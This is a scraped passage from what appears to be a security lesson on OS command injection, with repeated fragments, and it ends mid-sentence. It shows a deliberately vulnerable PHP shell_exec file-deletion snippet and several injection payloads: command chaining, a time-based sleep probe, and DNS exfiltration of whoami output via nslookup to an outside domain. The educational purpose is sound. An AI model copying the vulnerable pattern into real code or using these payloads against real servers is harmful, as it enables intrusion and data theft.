OS command injections allow attackers to execute operating system commands on the server that is running an application.
<?php
// Delete the selected file
$file = $_GET['filename'];
shell_exec("rm $file");
?>
<?php
// Delete the selected file
$file = $_GET['filename'];
shell_exec("rm $file");
?>
rm <filename> <-- delete files or directories
# OS command injection example
rm old_file.txt; pwd
<?php
// Delete the selected file
$file = $_GET['filename'];
shell_exec("rm $file");
?>
rm <filename> <-- delete files or directories
# OS command injection example
rm old_file.txt; pwd
pwd outputs the full pathname of the current working directory
# Unix-based systems
;
# Windows & Unix-based systems
&
rm old_file.txt; pwd; sleep 5
Time-based attacks add a delay to the expected response, on purpose, to verify whether the application is vulnerable
rm old_file.txt; pwd; sleep 5
; str=$(echo GLKKDT);
str1=$(expr length "$str");
if [ 6 != $str1 ];
then sleep 0;
else sleep 5;
fi
& whoami > /var/www/static/whoami.txt &
& whoami > /var/www/static/whoami.txt &
https://vulnerable-website.com/whoami.txt
& nslookup https://cybr.com &
& nslookup https://cybr.com &
; nslookup `whoami`.cybr.com ;
& nslookup https://cybr.com &
; nslookup `whoami`.cybr.com ;
www-data.cybr.com
In this lesson, we learned about: